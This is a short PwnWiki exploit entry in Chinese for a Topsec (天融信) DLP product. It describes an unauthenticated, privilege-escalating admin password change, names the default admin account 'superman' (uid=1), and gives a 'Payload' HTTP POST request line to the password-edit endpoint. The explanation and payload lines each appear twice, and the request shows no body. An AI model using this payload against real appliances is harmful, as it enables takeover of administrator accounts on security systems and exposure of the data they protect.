天融信DLP 未授權&越權漏洞
From PwnWiki
漏洞原理
管理員登錄系統系統之後修改密碼,未採用原密碼校驗,且存在未授權訪問導致存在越權修改管理員密碼。
默認用戶
superman --- uid=1
Payload
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
管理員登錄系統系統之後修改密碼,未採用原密碼校驗,且存在未授權訪問導致存在越權修改管理員密碼。
superman --- uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1